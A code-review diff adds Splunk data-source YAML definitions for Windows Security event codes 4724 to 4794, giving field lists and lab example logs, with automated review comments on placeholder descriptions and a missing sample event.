- TargetSid: user.uid
example_log: 10/09/2020 10:41:26 AM
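Review bot: `example_log: 10/09/2020 10:41:26 AM` on the last line is only a timestamp fragment, so the renamed 4720 object carries no usable sample event, while every newly added sibling in this diff (4724, 4725, 4726, ...) includes a full Security event with the subject and target fields populated. A sample that actually contains `EventCode`, the `Subject*` and `Target*` values would let the `fields` list above be checked against real data and would match the convention the new files establish. The 4732 rename in this diff is worth checking for the same gap; its `example_log` line is outside the visible hunk.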
diff --git a/data_sources/windows_event_log_security_4724.yml b/data_sources/windows_event_log_security_4724.yml
new file mode 100644
index 0000000000..85fbadeebc
--- /dev/null
+++ b/data_sources/windows_event_log_security_4724.yml
@@ -0,0 +1,106 @@
+name: Windows Event Log Security 4724
+id: 117fe51f-93f8-4589-8e8b-c6b7b7154c7d
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 4724
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+ url: https://splunkbase.splunk.com/app/742
+ version: 8.8.0
+fields:
+- _time
+- Caller_Domain
+- Caller_User_Name
+- CategoryString
+- Channel
+- Computer
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventID
+- EventRecordID
+- Guid
+- Keywords
+- Level
+- Logon_ID
+- Name
+- Opcode
+- ProcessID
+- RecordNumber
+- SubjectDomainName
+- SubjectLogonId
+- SubjectUserName
+- SubjectUserSid
+- SystemTime
+- System_Props_Xml
+- TargetDomainName
+- TargetSid
+- TargetUserName
+- Target_Domain
+- Target_User_Name
+- Task
+- ThreadID
+- Version
+- action
+- app
+- change_type
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_nt_domain
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- name
+- object
+- object_attrs
+- object_category
+- object_id
+- product
+- punct
+- result
+- session_id
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- src_nt_domain
+- src_user
+- src_user_name
+- status
+- subject
+- ta_windows_action
+- ta_windows_security_CategoryString
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- user_group
+- user_name
+- vendor
+- vendor_product
+example_log: 4724001382400x8020000000000000276779Securityar-win-dc.attackrange.localTRUMAN_CLEMENTSATTACKRANGEATTACKRANGE\TRUMAN_CLEMENTSATTACKRANGE\AdministratorAdministratorATTACKRANGE0x592d1
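Review bot: `description: Data source object for Windows Event Log Security 4724` repeats the `name` value and tells an analyst nothing about what the event records; the description is the one free-text field in the object, so it should carry the event's meaning, for example `description: Windows Security event 4724 - an attempt was made to reset an account's password.` (wording to be checked against Microsoft's event title). The same placeholder description is used in every new data_sources file in this diff (4725, 4726, 4738, 4739, 4741, 4742, 4768, 4769, 4771, 4776, 4781, 4794, 4798, 4876, 4886 and 4887), so it is worth a single pass over all of them. The `example_log` values name a lab domain (`attackrange.local`) and lab hosts, which is appropriate for committed samples; it is worth confirming that none of the samples across the diff were captured from a non-lab host before they are published.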
diff --git a/data_sources/windows_event_log_security_4725.yml b/data_sources/windows_event_log_security_4725.yml
new file mode 100644
index 0000000000..f9b68e4c9f
--- /dev/null
+++ b/data_sources/windows_event_log_security_4725.yml
@@ -0,0 +1,106 @@
+name: Windows Event Log Security 4725
+id: 31fd887d-0d14-44cc-bb64-80063a9f2968
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 4725
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+ url: https://splunkbase.splunk.com/app/742
+ version: 8.8.0
+fields:
+- _time
+- Caller_Domain
+- Caller_User_Name
+- CategoryString
+- Channel
+- Computer
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventID
+- EventRecordID
+- Guid
+- Keywords
+- Level
+- Logon_ID
+- Name
+- Opcode
+- ProcessID
+- RecordNumber
+- SubjectDomainName
+- SubjectLogonId
+- SubjectUserName
+- SubjectUserSid
+- SystemTime
+- System_Props_Xml
+- TargetDomainName
+- TargetSid
+- TargetUserName
+- Target_Domain
+- Target_User_Name
+- Task
+- ThreadID
+- Version
+- action
+- app
+- change_type
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_nt_domain
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- name
+- object
+- object_attrs
+- object_category
+- object_id
+- product
+- punct
+- result
+- session_id
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- src_nt_domain
+- src_user
+- src_user_name
+- status
+- subject
+- ta_windows_action
+- ta_windows_security_CategoryString
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- user_group
+- user_name
+- vendor
+- vendor_product
+example_log: 4725001382400x8020000000000000278771Securityar-win-dc.attackrange.localWILFORD_SUTTONATTACKRANGEATTACKRANGE\WILFORD_SUTTONATTACKRANGE\AdministratorAdministratorATTACKRANGE0x592d1
diff --git a/data_sources/windows_event_log_security_4726.yml b/data_sources/windows_event_log_security_4726.yml
new file mode 100644
index 0000000000..9dcfc00b39
--- /dev/null
+++ b/data_sources/windows_event_log_security_4726.yml
@@ -0,0 +1,107 @@
+name: Windows Event Log Security 4726
+id: 0b56dcd7-0f72-4a05-9226-d6059781737b
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 4726
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+ url: https://splunkbase.splunk.com/app/742
+ version: 8.8.0
+fields:
+- _time
+- Caller_Domain
+- Caller_User_Name
+- CategoryString
+- Channel
+- Computer
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventID
+- EventRecordID
+- Guid
+- Keywords
+- Level
+- Logon_ID
+- Name
+- Opcode
+- PrivilegeList
+- ProcessID
+- RecordNumber
+- SubjectDomainName
+- SubjectLogonId
+- SubjectUserName
+- SubjectUserSid
+- SystemTime
+- System_Props_Xml
+- TargetDomainName
+- TargetSid
+- TargetUserName
+- Target_Domain
+- Target_User_Name
+- Task
+- ThreadID
+- Version
+- action
+- app
+- change_type
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_nt_domain
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- name
+- object
+- object_attrs
+- object_category
+- object_id
+- product
+- punct
+- result
+- session_id
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- src_nt_domain
+- src_user
+- src_user_name
+- status
+- subject
+- ta_windows_action
+- ta_windows_security_CategoryString
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- user_group
+- user_name
+- vendor
+- vendor_product
+example_log: 4726001382400x8020000000000000279283Securityar-win-dc.attackrange.localLYNN_WOLFATTACKRANGES-1-5-21-2851375338-1978525053-2422663219-2445ATTACKRANGE\AdministratorAdministratorATTACKRANGE0x592d1-
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4732.yml b/data_sources/windows_event_log_security_4732.yml
similarity index 73%
rename from data_sources/endpoint/event_sources/Windows_Event_Log_Security_4732.yml
rename to data_sources/windows_event_log_security_4732.yml
index 79abe6dd18..490f96750f 100644
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4732.yml
+++ b/data_sources/windows_event_log_security_4732.yml
@@ -1,4 +1,16 @@
-event_name: Windows Event Log Security 4732
+name: Windows Event Log Security 4732
+id: b0d61c5d-aefe-486a-9152-de45cc10fbb4
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 4732
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+ url: https://splunkbase.splunk.com/app/742
+ version: 8.8.0
fields:
- _time
- Account_Domain
diff --git a/data_sources/windows_event_log_security_4738.yml b/data_sources/windows_event_log_security_4738.yml
new file mode 100644
index 0000000000..a0a4cd9ef0
--- /dev/null
+++ b/data_sources/windows_event_log_security_4738.yml
@@ -0,0 +1,132 @@
+name: Windows Event Log Security 4738
+id: cb85709b-101e-41a9-bb60-d2108f79dfbd
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 4738
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+ url: https://splunkbase.splunk.com/app/742
+ version: 8.8.0
+fields:
+- _time
+- AccountExpires
+- AllowedToDelegateTo
+- Caller_Domain
+- Caller_User_Name
+- CategoryString
+- Channel
+- Computer
+- DisplayName
+- Dummy
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventID
+- EventRecordID
+- Guid
+- HomeDirectory
+- HomePath
+- Keywords
+- Level
+- LogonHours
+- Logon_ID
+- Name
+- NewUacValue
+- OldUacValue
+- Opcode
+- PasswordLastSet
+- PrimaryGroupId
+- PrivilegeList
+- ProcessID
+- ProfilePath
+- RecordNumber
+- SamAccountName
+- ScriptPath
+- SidHistory
+- SubjectDomainName
+- SubjectLogonId
+- SubjectUserName
+- SubjectUserSid
+- SystemTime
+- System_Props_Xml
+- TargetDomainName
+- TargetSid
+- TargetUserName
+- Target_Domain
+- Target_User_Name
+- Task
+- ThreadID
+- UserAccountControl
+- UserParameters
+- UserPrincipalName
+- UserWorkstations
+- Version
+- action
+- app
+- change_type
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_nt_domain
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- name
+- object
+- object_attrs
+- object_category
+- object_id
+- product
+- punct
+- result
+- session_id
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- src_nt_domain
+- src_user
+- src_user_name
+- status
+- subject
+- ta_windows_action
+- ta_windows_security_CategoryString
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- user_group
+- user_name
+- vendor
+- vendor_product
+example_log: 4738001382400x80200000000000006389713Securityar-win-dc.attackrange.local-unprivATTACKRANGES-1-5-21-945660386-2529346225-2932127451-1112S-1-5-21-945660386-2529346225-2932127451-500AdministratorATTACKRANGE0x54bb3a-----------------
diff --git a/data_sources/windows_event_log_security_4739.yml b/data_sources/windows_event_log_security_4739.yml
new file mode 100644
index 0000000000..ede3cf72fd
--- /dev/null
+++ b/data_sources/windows_event_log_security_4739.yml
@@ -0,0 +1,118 @@
+name: Windows Event Log Security 4739
+id: c1e0442a-8a97-405d-baf2-057c5d68cd9a
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 4739
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+ url: https://splunkbase.splunk.com/app/742
+ version: 8.8.0
+fields:
+- _time
+- Caller_Domain
+- Caller_User_Name
+- CategoryString
+- Channel
+- Computer
+- DomainBehaviorVersion
+- DomainName
+- DomainPolicyChanged
+- DomainSid
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventID
+- EventRecordID
+- ForceLogoff
+- Guid
+- Keywords
+- Level
+- LockoutDuration
+- LockoutObservationWindow
+- LockoutThreshold
+- Logon_ID
+- MachineAccountQuota
+- MaxPasswordAge
+- MinPasswordAge
+- MinPasswordLength
+- MixedDomainMode
+- Name
+- OemInformation
+- Opcode
+- PasswordHistoryLength
+- PasswordProperties
+- PrivilegeList
+- ProcessID
+- RecordNumber
+- SubjectDomainName
+- SubjectLogonId
+- SubjectUserName
+- SubjectUserSid
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- Version
+- action
+- app
+- change_type
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- name
+- object_attrs
+- object_category
+- product
+- punct
+- result
+- session_id
+- severity
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- src_nt_domain
+- src_user
+- status
+- subject
+- ta_windows_action
+- ta_windows_security_CategoryString
+- tag
+- tag::action
+- tag::eventtype
+- timeendpos
+- timestartpos
+- vendor
+- vendor_product
+example_log: 4739001356900x8020000000000000394176Securityar-win-dc.attackrange.localLockout PolicyATTACKRANGEATTACKRANGE\NT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE0x3e7----1---------
diff --git a/data_sources/windows_event_log_security_4741.yml b/data_sources/windows_event_log_security_4741.yml
new file mode 100644
index 0000000000..9794e770dd
--- /dev/null
+++ b/data_sources/windows_event_log_security_4741.yml
@@ -0,0 +1,129 @@
+name: Windows Event Log Security 4741
+id: ef87257f-e7d1-4856-abae-097b2cfdcdb4
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 4741
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+ url: https://splunkbase.splunk.com/app/742
+ version: 8.8.0
+fields:
+- _time
+- AccountExpires
+- AllowedToDelegateTo
+- Caller_Domain
+- Caller_User_Name
+- CategoryString
+- Channel
+- Computer
+- DisplayName
+- DnsHostName
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventID
+- EventRecordID
+- Guid
+- HomeDirectory
+- HomePath
+- Keywords
+- Level
+- LogonHours
+- Logon_ID
+- Name
+- NewUacValue
+- OldUacValue
+- Opcode
+- PasswordLastSet
+- PrimaryGroupId
+- PrivilegeList
+- ProcessID
+- ProfilePath
+- RecordNumber
+- SamAccountName
+- ScriptPath
+- ServicePrincipalNames
+- SidHistory
+- SubjectDomainName
+- SubjectLogonId
+- SubjectUserName
+- SubjectUserSid
+- SystemTime
+- System_Props_Xml
+- TargetDomainName
+- TargetSid
+- TargetUserName
+- Target_Domain
+- Target_User_Name
+- Task
+- ThreadID
+- UserAccountControl
+- UserParameters
+- UserPrincipalName
+- UserWorkstations
+- Version
+- action
+- app
+- change_type
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_nt_domain
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- name
+- object_attrs
+- object_category
+- product
+- punct
+- result
+- session_id
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- src_nt_domain
+- src_user
+- status
+- subject
+- ta_windows_action
+- ta_windows_security_CategoryString
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- user_group
+- user_type
+- vendor
+- vendor_product
+example_log: 4741001382500x8020000000000000143475Securityar-win-dc.attackrange.localAR-WIN-2$ATTACKRANGEATTACKRANGE\AR-WIN-2$ATTACKRANGE\AdministratorAdministratorATTACKRANGE0xd9f04-AR-WIN-2$-------4/8/2024 6:48:04 PM%%1794515-0x00x80
diff --git a/data_sources/windows_event_log_security_4742.yml b/data_sources/windows_event_log_security_4742.yml
new file mode 100644
index 0000000000..5f6027fe5a
--- /dev/null
+++ b/data_sources/windows_event_log_security_4742.yml
@@ -0,0 +1,131 @@
+name: Windows Event Log Security 4742
+id: ea830adf-5450-489a-bcdc-fb8d2cbe674c
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 4742
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+ url: https://splunkbase.splunk.com/app/742
+ version: 8.8.0
+fields:
+- _time
+- AccountExpires
+- AllowedToDelegateTo
+- Caller_Domain
+- Caller_User_Name
+- CategoryString
+- Channel
+- Computer
+- ComputerAccountChange
+- DisplayName
+- DnsHostName
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventID
+- EventRecordID
+- Guid
+- HomeDirectory
+- HomePath
+- Keywords
+- Level
+- LogonHours
+- Logon_ID
+- Name
+- NewUacValue
+- OldUacValue
+- Opcode
+- PasswordLastSet
+- PrimaryGroupId
+- PrivilegeList
+- ProcessID
+- ProfilePath
+- RecordNumber
+- SamAccountName
+- ScriptPath
+- ServicePrincipalNames
+- SidHistory
+- SubjectDomainName
+- SubjectLogonId
+- SubjectUserName
+- SubjectUserSid
+- SystemTime
+- System_Props_Xml
+- TargetDomainName
+- TargetSid
+- TargetUserName
+- Target_Domain
+- Target_User_Name
+- Task
+- ThreadID
+- UserAccountControl
+- UserParameters
+- UserPrincipalName
+- UserWorkstations
+- Version
+- action
+- app
+- change_type
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_nt_domain
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- name
+- object_attrs
+- object_category
+- product
+- punct
+- result
+- session_id
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- src_nt_domain
+- src_user
+- status
+- subject
+- ta_windows_action
+- ta_windows_security_CategoryString
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- user_group
+- user_type
+- vendor
+- vendor_product
+example_log: 4742001382500x8020000000000000901860Securitywin-dc-root-04195-428.attackrange.local-WIN-HOST-ROOT-0$ATTACKRANGES-1-5-21-199921393-3534762603-6736986-1111S-1-5-21-199921393-3534762603-6736986-500AdministratorATTACKRANGE0x177304-----------------
diff --git a/data_sources/windows_event_log_security_4768.yml b/data_sources/windows_event_log_security_4768.yml
new file mode 100644
index 0000000000..400aa553d4
--- /dev/null
+++ b/data_sources/windows_event_log_security_4768.yml
@@ -0,0 +1,107 @@
+name: Windows Event Log Security 4768
+id: 4a5fd6ed-66bd-4f34-bc74-51c00c73c298
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 4768
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+ url: https://splunkbase.splunk.com/app/742
+ version: 8.8.0
+fields:
+- _time
+- Channel
+- Computer
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventID
+- EventRecordID
+- Guid
+- IpAddress
+- IpPort
+- Keywords
+- Level
+- Name
+- Opcode
+- PreAuthType
+- ProcessID
+- RecordNumber
+- ServiceName
+- ServiceSid
+- Source_Port
+- Source_Workstation
+- Status
+- SystemTime
+- System_Props_Xml
+- TargetDomainName
+- TargetSid
+- TargetUserName
+- Target_Domain
+- Target_User_Name
+- Task
+- ThreadID
+- TicketEncryptionType
+- TicketOptions
+- Version
+- action
+- app
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_nt_domain
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- name
+- product
+- punct
+- service
+- service_id
+- service_name
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- src_nt_host
+- src_port
+- status
+- subject
+- ta_windows_action
+- ta_windows_status
+- tag
+- tag::action
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- user_group
+- vendor
+- vendor_product
+example_log: 4768001433900x8010000000000000391562Securitywin-dc-mvelazco-02713-392.attackrange.localRXETPKZHattackrange.localNULL SIDkrbtgt/attackrange.localNULL SID0x408100100x120xffffffff-::ffff:10.0.1.1564568
diff --git a/data_sources/windows_event_log_security_4769.yml b/data_sources/windows_event_log_security_4769.yml
new file mode 100644
index 0000000000..353f71515d
--- /dev/null
+++ b/data_sources/windows_event_log_security_4769.yml
@@ -0,0 +1,106 @@
+name: Windows Event Log Security 4769
+id: 358d5520-f40b-4fa2-b799-966c030cb731
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 4769
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+ url: https://splunkbase.splunk.com/app/742
+ version: 8.8.0
+fields:
+- _time
+- Channel
+- Computer
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventID
+- EventRecordID
+- Guid
+- IpAddress
+- IpPort
+- Keywords
+- Level
+- LogonGuid
+- Name
+- Opcode
+- ProcessID
+- RecordNumber
+- ServiceName
+- ServiceSid
+- Source_Port
+- Source_Workstation
+- Status
+- SystemTime
+- System_Props_Xml
+- TargetDomainName
+- TargetUserName
+- Target_Domain
+- Target_User_Name
+- Task
+- ThreadID
+- TicketEncryptionType
+- TicketOptions
+- TransmittedServices
+- Version
+- action
+- app
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_nt_domain
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- name
+- product
+- punct
+- service
+- service_id
+- service_name
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- src_nt_host
+- src_port
+- status
+- subject
+- ta_windows_action
+- ta_windows_status
+- tag
+- tag::action
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- user_group
+- vendor
+- vendor_product
+example_log: 4769001433700x8020000000000000148521Securityar-win-dc.attackrange.localAR-WIN-2$@ATTACKRANGE.LOCALATTACKRANGE.LOCALAR-WIN-2$ATTACKRANGE\AR-WIN-2$0x408100000x17::ffff:10.0.1.15591910x0{3b4ad75b-7184-6094-b975-ea3f91932ee0}-
diff --git a/data_sources/windows_event_log_security_4771.yml b/data_sources/windows_event_log_security_4771.yml
new file mode 100644
index 0000000000..1b622c319e
--- /dev/null
+++ b/data_sources/windows_event_log_security_4771.yml
@@ -0,0 +1,100 @@
+name: Windows Event Log Security 4771
+id: 418debbb-adf3-48ec-9efd-59d45f8861e5
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 4771
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+ url: https://splunkbase.splunk.com/app/742
+ version: 8.8.0
+fields:
+- _time
+- Channel
+- Computer
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventID
+- EventRecordID
+- Guid
+- IpAddress
+- IpPort
+- Keywords
+- Level
+- Name
+- Opcode
+- PreAuthType
+- ProcessID
+- RecordNumber
+- ServiceName
+- Source_Port
+- Source_Workstation
+- Status
+- SystemTime
+- System_Props_Xml
+- TargetSid
+- TargetUserName
+- Target_User_Name
+- Task
+- ThreadID
+- TicketOptions
+- Version
+- action
+- app
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- name
+- product
+- punct
+- service
+- service_name
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- src_nt_host
+- src_port
+- status
+- subject
+- ta_windows_action
+- ta_windows_status
+- tag
+- tag::action
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- user_group
+- vendor
+- vendor_product
+example_log: 4771001433900x8010000000000000391511Securitywin-dc-mvelazco-02713-392.attackrange.localALLISON_WATERSATTACKRANGE\ALLISON_WATERSkrbtgt/attackrange.local0x408100100x182::ffff:10.0.1.1564134
diff --git a/data_sources/windows_event_log_security_4776.yml b/data_sources/windows_event_log_security_4776.yml
new file mode 100644
index 0000000000..355bc68f64
--- /dev/null
+++ b/data_sources/windows_event_log_security_4776.yml
@@ -0,0 +1,88 @@
+name: Windows Event Log Security 4776
+id: 1da9092a-c795-4a26-ace8-d43855524e96
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 4776
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+ url: https://splunkbase.splunk.com/app/742
+ version: 8.8.0
+fields:
+- _time
+- Channel
+- Computer
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventID
+- EventRecordID
+- Guid
+- Keywords
+- Level
+- Name
+- Opcode
+- PackageName
+- ProcessID
+- RecordNumber
+- Source_Workstation
+- Status
+- SystemTime
+- System_Props_Xml
+- TargetUserName
+- Target_User_Name
+- Task
+- ThreadID
+- Version
+- Workstation
+- action
+- app
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- name
+- product
+- punct
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- src
+- src_nt_host
+- status
+- subject
+- ta_windows_action
+- ta_windows_status
+- tag
+- tag::action
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- user_group
+- vendor
+- vendor_product
+example_log: 4776001433600x8010000000000000391615Securitywin-dc-mvelazco-02713-392.attackrange.localMICROSOFT_AUTHENTICATION_PACKAGE_V1_0KSYLEFUAWIN-HOST-MVELAZ0xc0000064
diff --git a/data_sources/windows_event_log_security_4781.yml b/data_sources/windows_event_log_security_4781.yml
new file mode 100644
index 0000000000..0ea1b71cf7
--- /dev/null
+++ b/data_sources/windows_event_log_security_4781.yml
@@ -0,0 +1,109 @@
+name: Windows Event Log Security 4781
+id: 9732ffe7-ebce-4557-865c-1725a0f633cb
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 4781
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+ url: https://splunkbase.splunk.com/app/742
+ version: 8.8.0
+fields:
+- _time
+- ActivityID
+- Caller_Domain
+- Caller_User_Name
+- CategoryString
+- Channel
+- Computer
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventID
+- EventRecordID
+- Guid
+- Keywords
+- Level
+- Logon_ID
+- Name
+- NewTargetUserName
+- OldTargetUserName
+- Opcode
+- PrivilegeList
+- ProcessID
+- RecordNumber
+- SubjectDomainName
+- SubjectLogonId
+- SubjectUserName
+- SubjectUserSid
+- SystemTime
+- System_Props_Xml
+- TargetDomainName
+- TargetSid
+- Target_Domain
+- Task
+- ThreadID
+- Version
+- action
+- app
+- change_type
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_nt_domain
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- name
+- object
+- object_attrs
+- object_category
+- object_id
+- product
+- punct
+- result
+- session_id
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- src_nt_domain
+- src_user
+- src_user_name
+- status
+- subject
+- ta_windows_action
+- ta_windows_security_CategoryString
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- user_name
+- vendor
+- vendor_product
+example_log: 4781001382400x8020000000000000148763Securityar-win-dc.attackrange.localAR-WIN-2$AdministratorATTACKRANGEATTACKRANGE\AR-WIN-2$ATTACKRANGE\AdministratorAdministratorATTACKRANGE0x141a04-
diff --git a/data_sources/windows_event_log_security_4794.yml b/data_sources/windows_event_log_security_4794.yml
new file mode 100644
index 0000000000..d640de4776
--- /dev/null
+++ b/data_sources/windows_event_log_security_4794.yml
@@ -0,0 +1,98 @@
+name: Windows Event Log Security 4794
+id: ec7da74f-274a-4bde-aa0e-15c68aca0426
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Windows Event Log Security 4794
+source: XmlWinEventLog:Security
+sourcetype: xmlwineventlog
+separator: EventCode
+supported_TA:
+- name: Splunk Add-on for Microsoft Windows
+ url: https://splunkbase.splunk.com/app/742
+ version: 8.8.0
+fields:
+- _time
+- ActivityID
+- Caller_Domain
+- Caller_User_Name
+- CategoryString
+- Channel
+- Computer
+- Error_Code
+- EventCode
+- EventData_Xml
+- EventID
+- EventRecordID
+- Guid
+- Keywords
+- Level
+- Logon_ID
+- Name
+- Opcode
+- ProcessID
+- RecordNumber
+- Source_Workstation
+- Status
+- SubjectDomainName
+- SubjectLogonId
+- SubjectUserName
+- SubjectUserSid
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- Version
+- Workstation
+- action
+- app
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- name
+- product
+- punct
+- session_id
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- src
+- src_nt_domain
+- src_nt_host
+- src_user
+- status
+- subject
+- ta_windows_action
+- ta_windows_security_CategoryString
+- ta_windows_status
+- tag
+- tag::action
+- tag::eventtype
+- timeendpos
+- timestartpos
+- vendor
+- vendor_product
+example_log: 4794001382400x8020000000000000821077Securitywin-dc-root-17044-552.attackrange.localATTACKRANGE\AdministratorAdministratorATTACKRANGE0x959c5[fe80::b907:7694:d740:91bb]0x0
